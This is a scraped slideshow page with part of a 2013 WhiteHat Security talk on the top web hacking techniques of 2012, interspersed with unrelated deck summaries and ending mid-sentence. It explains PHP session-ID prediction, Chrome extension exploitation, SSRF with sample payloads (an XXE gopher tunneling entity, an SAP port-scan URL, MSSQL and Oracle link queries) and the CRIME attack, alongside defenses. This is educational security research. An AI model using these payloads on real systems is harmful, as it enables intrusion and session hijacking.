This year WhiteHat SecurityTM celebrates its fteenth anniversary, and the eleventh year that we have produced the Web Applications Security Statistics Report. The stats shared in this report are based on the aggregation of all the scanning and remediation data obtained from applications that used the WhiteHat SentinelTM service for application security testing in 2015. As an early pioneer in the Application Security Market, WhiteHat has a large and unique collection of data to work with.

web application security statistics metrics 2016
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking

This document introduces the concept of ethical hacking. It begins by defining hacking as finding solutions to real-life problems, and clarifies that the original meaning of "hack" was not related to computers. It then discusses how the term entered computer culture at MIT in the 1960s, where hackers were students who solved problems in innovative ways, unlike "tools" who just attended class. The document outlines some traits of good hacks and provides examples. It emphasizes that media misconstrues hackers as criminals, and explains that real hackers have strong ethics and help catch cyber criminals, unlike crackers who hack systems illegally. The rest of the document provides an overview of skills, subjects, and basic concepts needed for ethical hacking.

information securityethical hacking
T H E AT TAC K




Gain Access




                                 The easy way

© 2013 WhiteHat Security, Inc.                  41
Real World Examples




© 2013 WhiteHat Security, Inc.   42
T H E AT TAC K




Gain Access




 The less easy way



© 2013 WhiteHat Security, Inc.   43
Basic Auth Brute Force




© 2013 WhiteHat Security, Inc.   44

Recommended for you

ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times

This document discusses ethical hacking. It defines ethical hacking as testing systems for security purposes with permission, compared to cracking which is hacking without permission for malicious reasons. It outlines different types of hackers like script kiddies, white hat hackers who hack legally for security work, grey hat hackers who can help or harm, and black hat hackers who hack criminally. The document advises on security practices like using antiviruses and strong passwords to prevent hacking.

ethical hackinghackingcracking
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation

This document provides an overview of security and hacking. It defines security as protection from harm and defines differences between security and protection. It then discusses what hacking and hackers are, provides a brief history of hacking from the 1960s to present day, and describes different types of hackers like white hat and black hat hackers. The document also outlines the hacking process and some common tools used. It lists some famous hackers and recent news stories about hacking.

Hacking ppt
Hacking pptHacking ppt
Hacking ppt

The document discusses ethical hacking and describes hackers. It defines ethical hacking as evaluating a system's security vulnerabilities by attempting to break into computer systems. Ethical hackers possess strong programming and networking skills and detailed hardware/software knowledge. They evaluate systems by determining what intruders can access, what they can do with that information, and if intruder attempts can be detected. The document outlines different types of hackers and classes them as black hats, white hats, gray hats, and ethical hackers based on their motivations and how they use their skills.

EXPL O IT




HTML5 File Upload




                             Load Malicious Firmware to memory
                                                       https://github.com/superevr/ddwrt-install-tool

© 2013 WhiteHat Security, Inc.                                                               45
D EF EN SE




Router
• Change default passwords!



Browser
• NoScript, Request Policy, Other XSS & CSRF protections




© 2013 WhiteHat Security, Inc.                             46
2 0 1 2 TO P T EN




                                      Bruteforce
                                      of PHPSESSID
―...We provide a number of practical techniques and algorithms for
exploiting randomness vulnerabilities in PHP applications. We focus on
the predictability of password reset tokens and demonstrate how an
attacker can take over user accounts in a web application via predicting
or algorithmically derandomizing the PHP core randomness generators.‖

Arseny Reutov, Timur Yunusov, and Dmitry Nagibin
http://blog.ptsecurity.com/2012/08/not-so-random-numbers-take-two.html

George Argyros and Aggelos Kiayias
http://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks_files/paper.pdf
http://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks.html

© 2013 WhiteHat Security, Inc.                                             47
BASIC S




PHPSESSID =
md5( client IP . timestamp . microseconds1 . php_combined_lcg() )
•    client IP is known to the attacker;
•    timestamp is known through Date HTTP-header;
•    microseconds1 – a value from 0 to 1000000;
•    php_combined_lcg() – an example value is 0.12345678.


To generate php_combined_lcg(), two seeds are used:
S1 = timestamp XOR (microseconds2 << 11)
S2 = pid XOR (microseconds3 << 11)
•    timestamp is the same;
•    microseconds2 is greater than microseconds1 (when the first time measurement was made) by 0–3;
•    pid is the id of the current process (0–32768, 1024–32768 on Unix);
•    microseconds3 is greater than microseconds2 by 1–4.



“The greatest entropy is contained in microseconds1, however with the use of two
techniques it can be substantially reduced.”

© 2013 WhiteHat Security, Inc.                                                                   48

Recommended for you

Cyber security presentation
Cyber security presentationCyber security presentation
Cyber security presentation

Cyber security involves protecting computers, networks, programs and data from unauthorized access and cyber attacks. It includes communication security, network security and information security to safeguard organizational assets. Cyber crimes are illegal activities that use digital technologies and networks, and include hacking, data and system interference, fraud, and illegal device usage. Some early forms of cyber crime date back to the 1970s. Maintaining antivirus software, firewalls, backups and strong passwords can help protect against cyber threats while being mindful of privacy and security settings online. The document provides an overview of cyber security, cyber crimes, their history and basic safety recommendations.

#cybersecurity#security in it
Cybercrime.ppt
Cybercrime.pptCybercrime.ppt
Cybercrime.ppt

Cyber crime involves unlawful activities using computers and the internet. The document categorizes cyber crimes as those using computers to attack other computers or as tools to enable real-world crimes. It provides examples of various cyber crimes like hacking, child pornography, viruses, and cyber terrorism. It stresses the importance of cyber security to defend against attacks through prevention, detection and response. The document advises safety tips like using antivirus software, firewalls, and strong passwords. India's cyber laws address both traditional crimes committed online and new crimes defined in the Information Technology Act.

Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types

This document provides an overview of hacking, including its history, definitions, types, famous hackers, reasons for hacking, and advice on security and ethics. Hacking emerged in the 1960s at MIT and refers to attempting to gain unauthorized access to computer systems. It describes hackers as those who exploit weaknesses in computers. Different types of hacking are outlined such as website, network, password, and computer hacking. Advice is given around using strong unique passwords, backing up data, and contacting authorities if hacked. Both advantages like security testing and disadvantages like privacy harm are discussed.

T EC H N IQ UE 1




Adversarial Time Synchronization
ATS: Send a pair of HTTP requests to determine the moment when the second in the
Date HTTP header changes.

1) Connect to a web server and send request pairs: 1st to a non-
   existent page so it‘ll take a minimum time for the web-server
   to return the response. The 2nd to our target web-application.   HTTP/1.1 200 OK
2) Get an average time interval between sending an HTTP             Date: Wed, 08 Aug 2012 06:05:14 GMT
   request and receiving the response (= RTT)                       …
                                                                    HTTP/1.1 200 OK
3) When the seconds in Date HTTP-header of the two requests         Date: Wed, 08 Aug 2012 06:05:15 GMT
   changed approximate the time of remote microseconds in
   local time using RTTs of the two requests divided by two and
   offsetting the delay between requests.
4) If session_start() is called somewhere deeper in the code, you
   may try to install the web-app locally and get the approximate
   time when it is called.


“...the microseconds between our requests zeroed. By sending requests with dynamic
delays it is possible to synchronize local value of microseconds with the server one.”

© 2013 WhiteHat Security, Inc.                                                                   49
T EC H N IQ UE 2


  Request Twins
  Attacker send two requests: the 1st — to reset their own password and the 2nd —
  to reset that of an administrator. The gap between microseconds will be minimal.


To increase speed over the
PasswordPro module by
taking advantage of positive
linear correlation between
deltas of
microseconds, they created
their own application.




  16 million hashes per second, seed calculation takes less than an hour on 3.2 GHz
  Quad Core i5. Having pid and php_combined_lcg one can compute the seed used in
  mt_rand. (timestamp x pid) XOR (106 x php_combined_lcg())

  “if a web application uses standard PHP sessions, it is possible to obtain the random
  numbers generated via mt_rand(), rand(), and uniqid().”

  © 2013 WhiteHat Security, Inc.                                                          50
T EC H N IQ UE 3


Get mt_rand seed through random
numbers leakage
“The seed used for mt_rand is an unsigned integer 2^32. If a random number
leaked, it is possible to get the seed using PHP itself and rainbow tables. It takes
less than 10 minutes.”




The scripts to generate rainbow tables, search the seed, and ready-made tables
http://www.gat3way.eu/poc/mtrt/

© 2013 WhiteHat Security, Inc.                                                    51
SO L U T IONS




What to look for and code defense
“All the mt_rand(), rand(), uniqid(), shuffle(), lcg_value(), etc. The only secure
function is openssl_random_pseudo_bytes(), but it is rarely used in web
applications.”



•    MySQL function RAND() — it can be also predicted though.
•    Suhosin patch — does not patch mt_srand, srand. The Suhosin extension should
     also be installed.
•    /dev/urandom — the securest way.




© 2013 WhiteHat Security, Inc.                                                       52

Recommended for you

Cyber crime and security ppt
Cyber crime and security pptCyber crime and security ppt
Cyber crime and security ppt

This document provides an overview of cyber crime and security. It defines cyber crime as illegal activity committed on the internet, such as stealing data or importing malware. The document then covers the history and evolution of cyber threats. It categorizes cyber crimes as those using the computer as a target or weapon. Specific types of cyber crimes discussed include hacking, denial of service attacks, virus dissemination, computer vandalism, cyber terrorism, and software piracy. The document concludes by emphasizing the importance of cyber security.

Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008

Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. During his session, the top 10 vulnerabilities present in 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually be able to walk through the vulnerabilities appearing on today’s corporate websites, learning real-world solutions to today’s web application security issues. Moderator: Mike Stephenson, SC lab manager, SC Magazine - Jeremiah Grossman, founder and chief technology officer, WhiteHat Security

web application security hacking jeremiah grossman
White paper screen
White paper screenWhite paper screen
White paper screen

The document discusses cross-site tracing (XST), a new web security attack technique that can bypass the HTTP-only security mechanism in Internet Explorer 6 SP1. XST uses the HTTP TRACE request method to echo back request headers, including authentication cookies, allowing an attacker to access credentials from any site. The document provides background on the TRACE method and how it is enabled by default on many web servers. It also explains the HTTP-only cookie option that aims to prevent access to cookies via JavaScript but is circumvented by XST.

2 0 1 2 TO P T EN




                                      Chrome addon hacking
―Webpages can sometimes interact with Chrome addons and that
might be dangerous. Chrome addons fingerprinting, universal
XSS, bypass AdBlock, Chrome Extension Exploitation
Framework, and owning a system.‖



―Krzysztof Kotowicz
http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
http://blog.kotowicz.net/2012/02/chrome-addons-hacking-want-xss-on.html
http://blog.kotowicz.net/2012/03/chrome-addons-hacking-bye-bye-adblock.html
http://blog.kotowicz.net/2012/07/xss-chef-chrome-extension-exploitation.html
http://blog.kotowicz.net/2012/09/owning-system-through-chrome-extension.html

© 2013 WhiteHat Security, Inc.                                                 53
H ISTO RY




Hacking Google ChromeOS
“Googleʼsdrive to move away from the desktop, and into the cloud results in desktop
applications being replaced with HTML5 & JavaScript rich extensions. These new
“desktop programs” seem to be more secure, because they do not have the classic
vulnerabilities that desktop applications end services have--buffer/stack/heap
overflows/underflows, format string attacks, plus many more. Since exploitation no
longer leads to shell, the real dangers and implications of any exploit seem to be
mitigated.
Unfortunately, this is not true. HTML and Javascript applications (Chrome Extensions)
are now vulnerable to standard HTML and Javascript attacks. The most serious, in this
situation, is Cross Site Scripting. By utilizing an XSS vulnerability in an extension, an
attacker can pivot from that extension, and take advantage of the permissions given to
it to attack and gain access to user information loaded in other tabs.”
-Matt Johansen & Kyle Osborn
BlackHat 2011 WhitePaper




© 2013 WhiteHat Security, Inc.                                                         54
BASIC S




Why Chrome Extensions?
•    Basic HTML applications
•    Access to extensive APIs
•    Permissions set by 3rd party Dev
•    Manifest.json
•    Sandbox side-step


Exploitation
• Universal XSS via 1 extension bug
• chrome.tabs, chrome.history, chrome.cookies, chrome.proxy, API access make for
  powerful attacks
• Filesystem access and remote code execution made easy




© 2013 WhiteHat Security, Inc.                                                     55
APPL IC AT IO N




BeEF & ChEF
• You‘ve found XSS in an extension, utilized it to exploit Javascript in any tab.
  Now what? Browser Exploitation Framework & Chrome Extension Exploitation
  Framework
•   BeEF – Metasploit of the web. Makes reflective XSS more persistent and able to replay exploits
•   ChEF – BeEF for Chrome Extensions.

    •    Monitor current sessions / open tabs
    •    Execute JavaScript on any site in any tab
    •    Access localStorage
    •    Read / write cookies
    •    Manipulate browser history
    •    Take screenshots
    •    Inject BeEF hooks to utilize their payloads and exploits




© 2013 WhiteHat Security, Inc.                                                                       56

Recommended for you

W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities

1) HTML5 and new web standards like Content Security Policy and cross-origin resource sharing improve security by enabling enforcement of policies like script isolation in the client instead of through server-side filtering. 2) Script injection vulnerabilities like cross-site scripting can be solved using these new client-side techniques rather than incomplete server-side simulations. 3) Mashups can be made more secure by using CORS to retrieve validated data instead of injecting code, and postMessage with isolated iframes to communicate with legacy APIs.

A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers

A security note to web developers on how they can instill safe security design practices on their web development projects.

web designweb securitydevops
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities

Slides for "HTML5 Security Realities" talk at W3Conf: Practical Standards for Web Professionals 2013. Brad Hill - PayPal @hillbrad

html5 security csp mashups
C H EF




ChEF Console




© 2013 WhiteHat Security, Inc.   57
EXPL O ITAT ION




XSS Everywhere
• If an extension‘s ‗manifest.json‘ file has permissions set to ‗*‘
  you can execute JavaScript anywhere in the browser with
  ‗chrome.tab.executeScript‘
• Bypass AdBlock:




    By altering the DOM you can create a global whitelist


© 2013 WhiteHat Security, Inc.                                        58
D EF EN SE




                                 Beware




© 2013 WhiteHat Security, Inc.            59
2 0 1 2 TO P T EN




                                    Pwning via SSRF
                                    (memcached, php-fastcgi, etc)
―SSRF, as in Server-Side Request Forgery. A great concept of the attack
which was discussed in 2008 with very little information about theory and
practical examples. The idea is to find victim server interfaces that will allow
sending packets initiated by victim's server to the localhost interface of the
victim server or to another server secured by firewall from outside. We have
found various SSRF vulnerabilities which allow internal network port
scanning, sending any HTTP requests from server, bruteforcing backed and
more but the most powerful technique was XXE Tunneling.‖
Alexander Polyakov
http://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_WP.pdf
http://erpscan.com/press-center/blog/ssrf-via-ws-adressing/
http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf

© 2013 WhiteHat Security, Inc.                                                                 60

Recommended for you

XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing

The document discusses a new web security technique called cross-site tracing (XST) that can bypass the HTTP-only security feature in Internet Explorer 6 SP1 and perform cross-site scripting attacks. XST exploits the TRACE HTTP request method, which echoes request information to the client, to obtain authentication cookies from other domains over HTTP and HTTPS. While HTTP-only helps prevent cookie access via JavaScript, XST can still access cookies through TRACE requests.

traceowaspattack
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101

This presentation by Mike Shame of Qualys the basics of Web Application Security and how to safeguard your web infrastructure against the most prevalent online threats and security risks, such as: cross-site scripting (XSS) attacks, SQL injection, directory traversals, and other web vulnerabilities. Learn how to proactively identify critical web application vulnerabilities and take corrective actions to minimize risks.

wasqualyssecurity
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security

This document discusses various web application security vulnerabilities and methods for mitigating them. It begins by summarizing the OWASP Top 10 list of most critical web application security risks. It then provides examples of different types of injection attacks, cross-site scripting, broken authentication and session management issues. The document also discusses insecure cryptographic storage, insufficient transport layer protection and other vulnerabilities. It emphasizes the importance of input and output validation, as well as proper encoding to prevent attacks. The OWASP ESAPI framework is presented as a tool to help developers address many of these security issues.

securitywebdata
H ISTO RY




SSRF (CIRCA 2008)
“The first example of SSRF is an SMBRelay attack discussed by Deral Heiland at
Shmoocon in 2008 entitled, “Web Portals Gateway To Information Or A Hole In Our
Perimeter Defenses.” Some web-interfaces on corporate portals allow loading any
external resource like an iframe. The difference was that Web interface allows loading
files from other HTTP sources. It was done by portlets that were designed to deliver to
the user the requested information that the user cannot access directly. The portlet
runs a transaction to a connected system and then runs its response with information
to the portal user. These portlets makes portal a single point of access to internal
resources. This was a great example of SSRF attack via URL parameter of vulnerable
portlet.”


…


“Later, other examples of SSRF attacks were shown. Same ideas, but attack was
executed through XML External Entity vulnerability. “



© 2013 WhiteHat Security, Inc.                                                        61
BASIC S




Attack Flow
•    Send Packet A to Service A
•    Service A initiates Packet B to Service B
•    Services can be on the same host or on
     different hosts
•    We can manipulate some fields of
     Packet B within Packet A
•    Various SSRF attacks depend on how
     many fields we can control in Packet B


Exploitation
• Vulnerabilities like File Include, SQL Injection, XML External Entity or any other
  vulnerability that allows executing commands that initiate calls to remote systems.
• Through enhanced rights in an application, when you can call HTTP pages or UNC
  paths or use trusted connections.

© 2013 WhiteHat Security, Inc.                                                          62
C L ASSIF IC AT ION




Many classes of SSRF attacks (complicated)
• Trusted SSRF: Send requests (Packet B) to remote services, but only to those
  which are somehow predefined.
• Remote SSRF: Requests (Packet B) to any remote IP and port. This type has
  3 subtypes depending on how much data we can control:
   • Simple Remote SSRF: No control on application level of Packet B
   • Partial Remote SSRF: Control on some fields of application level of Packet B
   • Full Remote SSRF: Full control on application level of Packet B




© 2013 WhiteHat Security, Inc.                                                      63
EXAMPL ES




Trusted SSRF attacks

MSSQL: Need at least public rights to use MSSQL trusted links. Links can be with
predefined passwords. The attacker can use them in Host A to forge requests and obtain
responses from Host B.
Select * from openquery(HostB,'select * from @@version')]


Oracle: Links can be with predefined passwords. The attacker can use them to forge
requests and obtain responses from host B.
SELECT * FROM myTable@HostB
EXECUTE mySchema.myPackage.myProcedure('someParameter')@HostB




© 2013 WhiteHat Security, Inc.                                                       64

Recommended for you

Top 10 Web Hacks 2013
Top 10 Web Hacks 2013Top 10 Web Hacks 2013
Top 10 Web Hacks 2013

This document summarizes the top ten web hacking techniques of 2013 as identified by WhiteHat Security. It provides brief descriptions of each technique, including Mutation XSS, BREACH, Pixel Perfect Timing Attacks with HTML5, Lucky 13, weaknesses in the RC4 encryption algorithm, XML Out of Band Data Retrieval, creating a million browser botnet, large-scale detection of DOM-based XSS, Tor Hidden Service passive decloaking, and HTML5 hard disk filler attacks. The document also provides background on the individuals and organization presenting this information.

web applicationsecurityinformation security
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)

video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users. The top attacks in 2010 include: • 'Padding Oracle' Crypto Attack • Evercookie • Hacking Auto-Complete • Attacking HTTPS with Cache Injection • Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution • Universal XSS in IE8 • HTTP POST DoS • JavaSnoop • CSS History Hack In Firefox Without JavaScript for Intranet Portscanning • Java Applet DNS Rebinding Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.

grossmansecurityhacking
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )

This document discusses the Heartbleed vulnerability in OpenSSL and its potential impacts. Heartbleed is a bug in the OpenSSL cryptography library that exposes the contents of the server's memory, including private keys and user session cookies. An attacker can exploit Heartbleed to steal sensitive data from vulnerable servers or impersonate services. The vulnerability had widespread implications because OpenSSL is used to secure a majority of websites. While patching servers and changing passwords addressed direct theft of information, Heartbleed also weakened the security of encrypted communications and online identities.

websitehackinginformation security
EXAMPL ES




Simple Remote SSRF
SAP NetWeaver ipcpricing: Scan an internal network from the Internet by sending
different HTTP requests to JSP pages.
/ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&dispatcher=&targetCli
ent=




© 2013 WhiteHat Security, Inc.                                                    65
XXE T U N N EL IN G




Partial Remote SSRF
XXE Tunneling (via Gopher): XML External Entity (XXE) is a very popular vulnerability
in XML Parser. External entities force the XML parser to access the resource specified by
the URI, e.g., a file on the local machine or on a remote systems.
• Makes a TCP connection with 172.16.0.1 and port 3300 and then send a packet
  containing string 23456789 (the first symbol will be cut).


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM ―gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>




© 2013 WhiteHat Security, Inc.                                                       66
D IAG R AM




© 2013 WhiteHat Security, Inc.   67
AD VAN C ED




XXE Tunneling to Buffer Overflow
• A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in sapnote
  1487330)
• Shellcode size is limited to 255 bytes (name parameter)
• As we don‘t have direct connection to the Internet from the vulnerable system, we
  want to use DNS tunneling shellcode to connect back




© 2013 WhiteHat Security, Inc.                                                        68

Recommended for you

XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf

This document provides an introduction to web security and the browser security model. It discusses goals of web security including safely browsing the web and supporting secure web applications. It outlines common web threat models and covers topics like HTTP, rendering content, isolation using frames and same-origin policy, communication between frames, frame navigation policies, client state using cookies, and clickjacking. The document aims to provide background knowledge on how the web and browsers work from a security perspective.

4.Xss
4.Xss4.Xss
4.Xss

The document discusses cross-site scripting (XSS) vulnerabilities. It defines XSS as allowing malicious scripts to be served to users from a vulnerable website. There are different types of XSS vulnerabilities including those without storage and with storage of malicious scripts on the website. The document provides examples of XSS vulnerabilities and discusses how they can be used to steal user credentials and track users. It also outlines challenges in preventing XSS vulnerabilities.

coursesecurity
Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websites

Jeremiah Grossman and T.C. Niedzialkowski presented on the dangers of JavaScript malware exploiting vulnerabilities to hack intranet websites from outside the network. They demonstrated how JavaScript malware can steal browser history, fingerprint servers, and change router passwords by exploiting vulnerabilities like cross-site scripting and cross-site request forgery. The presentation recommended hardening websites by validating input, protecting sensitive functionality, finding vulnerabilities through assessments, and using web application firewalls.

PAC KET B




© 2013 WhiteHat Security, Inc.   69
PAC KET A




Insert Packet B into Packet A
• We need to insert non-printable symbols. Gopher supports urlencode like HTTP
• Also help evade attack against IDS systems




© 2013 WhiteHat Security, Inc.                                                   70
FULL CONTROL




© 2013 WhiteHat Security, Inc.   71
C O U N T ER -AT TAC K




SSRF back connect attack
We send a command from Server A to our Server C using SSRF, and then we generate a
response which will trigger a vulnerability in an application from Server A.
SMB client
• DoS by reading huge files remotely
• SMBRelay
• RCE Vulnerabilities in SMB client
Memory corruption vulnerabilities in FTP client
Client path traversal
JAR parser
mailto: parser
HTTP client
• DoS by multiple entities with links to big data
• DoS by multiple GZIP bomb

© 2013 WhiteHat Security, Inc.                                                72

Recommended for you

Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot

Web Application Security: The Land that Information Security Forgot Today, the vast majority of those within information security have heard about web application security and posses at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications become undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential. Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security". This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attack in action, and possible countermeasures. Founder and chairman of WhiteHat Security, and former information security officer with Yahoo!. As information security officer at Yahoo!, Jeremiah was designing, auditing, and penetration-testing the huge company's web applications which demand highest security. During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions such as the Defcon, Air Force and Technology Conference, ToorCon, and others. Jeremiah is a lead contributor to the "Open Web Application Security Project" www.owasp.com and considered to be among the foremost web security experts.

jeremiah grossman whitehat security black hat 2001
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...

This document summarizes an upcoming presentation on browser exploitation techniques. It will discuss previous episodes on the topic, the state of cross-site scripting (XSS) vulnerabilities, a new type of non-persistent global or URL-based XSS, exploiting mobile devices through multiple technologies like SMS and Bluetooth, and demonstrating exploitation using tools like BeEF and Metasploit. The presentation aims to show how easily a browser can be attacked and to change perceptions of XSS vulnerabilities.

rooted2011
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe

The document discusses securing web applications from common vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It outlines various techniques attackers use to exploit these issues, such as injecting malicious scripts into user input or forging unauthorized requests. The document then provides recommendations for developers to prevent these attacks, such as carefully validating and encoding all user input, and authenticating that requests are intended by the user.

jeremiah grossman joe walker ajax experience web a
2 0 1 2 TO P T EN




                                        CRIME
―Compression Ratio Info-leak Made Easy (CRIME) is a
security exploit against secret web cookies over connections
using the HTTPS and SPDY protocols that also use data
compression. When used to recover the content of secret
authentication cookies, it allows an attacker to perform session
hijacking.‖


Juliano Rizzo and Thai Duong
http://netifera.com/research/crime/CRIME_ekoparty2012.pdf
http://en.wikipedia.org/wiki/CRIME_(security_exploit)
http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/

© 2013 WhiteHat Security, Inc.                                          73
BASIC S




CRIME
Decrypts HTTPS traffic to steal cookies and hijack sessions. Requirements to
become a victim:

1) Attacker can sniff your network traffic.
2) Victim visits evil.com
3) Both the browser and server support any
   version of TLS compression or SPDY


     Previously                           *
     Vulnerable




       Never
     Vulnerable


Gmail, Twitter, Dropbox, GitHub, etc.
“42% of sites surveyed by his service support TLS compression.” Ivan Ristic
https://www.ssllabs.com/index.html

© 2013 WhiteHat Security, Inc.                                                 74
SID E - C H AN NEL




CRIME: Chosen Plaintext Attack
•    Compression reduces the number of bytes contained in a data stream
     by removing redundant bits. A side effect of compression is it leaks
     clues about the encrypted contents, providing a "side channel" to those
     with the ability to monitor the data.
•    By modifying the clear-text payload hundreds or thousands of times
     and watching how each one interacts with the encrypted
     data, attackers can deduce its contents.
•    An encrypted message is combined with attacker-controlled JavaScript
     that, letter by letter, performs a brute-force attack on the secret key.
     When it guesses the letter X as the first character of the cookie
     secret, the encrypted message will appear differently than an
     encrypted message that uses W or Y.
•    Once the first character is correctly guessed, the attack repeats the
     process again on the next character in the key until the remainder of
     the secret is deduced. The use of JavaScript isn't necessary, but does
     make the brute-force attack faster.


http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/

© 2013 WhiteHat Security, Inc.                                                  75
AT TAC K F L O W


"Basically, the attacker is running script in Evil.com. He forces the browser to open
requests to Bank.com by, for example, adding <img> tags with src pointing to
Bank.com," Rizzo said. "Each of those requests contains data from mixed sources.”

In these requests, attacker data and data produced by the browser is compressed and
mixed together. Those requests can include the path, which the attacker controls, the
browser's headers, which are public, and the cookie, which should be secret.

"The problem is that compression combines all
those sources together," Rizzo added. "The
attacker can sniff the packets and get the size
of the requests that are sent. By changing the
path, he could attempt to minimize the request
size, i.e., when the file name matches the
cookie."




  http://threatpost.com/en_us/blogs/crime-attack-uses-compression-ratio-tls-requests-side-channel-hijack-secure-sessions-091312

  © 2013 WhiteHat Security, Inc.                                                                                                  76

Recommended for you

Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API

The open source TodoMVC project implements a Todo application using popular JavaScript MV* frameworks. Some of the implementations add support for compile to JavaScript languages, module loaders and real time backends. This presentation will demonstrate a TodoMVC implementation which adds support for the forthcoming W3C Web Cryptography API, as well as review some key cryptographic concepts and definitions. Instead of storing the Todo list as plaintext in localStorage, this "secure" TodoMVC implementation encrypts Todos using a password derived key. The PBKDF2 algorithm is used for the deriveKey operation, with getRandomValues generating a cryptographically random salt. The importKey method sets up usage of AES-CBC for both encrypt and decrypt operations. The final solution helps address item "A6-Sensitive Data Exposure" from the OWASP Top 10. With the Web Cryptography API being a recommendation in 2014, any Q&A time will likely include browser implementations and limitations, and whether JavaScript cryptography adds any value.

cryptographyjavascript
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)

With new tools like Angular.js and Node.js, it is easier than ever to build User Interfaces and Single-Page Applications (SPAs) backed by APIs. But how to do it securely? Web browsers are woefully insecure, and hand-rolled APIs are risky. In this presentation, Robert Damphousse, lead front-end developer at Stormpath, covers web browser security issues, technical best practices and how you can mitigate potential risks. Enjoy! Topics Covered: 1. Security Concerns for Modern Web Apps 2. Cookies, The Right Way 3. Session ID Problems 4. Token Authentication to the rescue! 5. Angular Examples

cookiesuiapi security
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities

The document discusses various techniques for hacking client-side insecurities, including discovering clients on the internet and intranet, attacking client-side through JavaScript jacking and pluggable protocol handlers, exploiting cross-site request forgery vulnerabilities, and fingerprinting clients through analysis of HTTP headers and browser information leaks. The presentation aims to demonstrate these hacking techniques through examples and a question/answer session.

D EMO




   Video demo shows Github.com, Dropbox.com, and Stripe.com, when visited with
   a then-patched version of Chrome, succumbing to the CRIME attack. All three of
   disabled compression and no longer vulnerable.

https://www.youtube.com/watch?v=gGPhHYyg9r4
 © 2013 WhiteHat Security, Inc.                                                     77
D EF EN SE




Browser
Upgrade browsers to the latest version.




Server
Disable compression.




© 2013 WhiteHat Security, Inc.            78
WHAT WE’VE LEARNED




© 2013 WhiteHat Security, Inc.     79
L ESSO N S




• What’s old is new and improved: Many Web attack techniques from
  previous years, including those not appearing on the Top Ten, are
  constantly being improved. Researchers leverage new technology
  functionality and combine previously known techniques and produce
  combinations.
• 3-Peat: Encryption related attack techniques, by Juliano Rizzo and
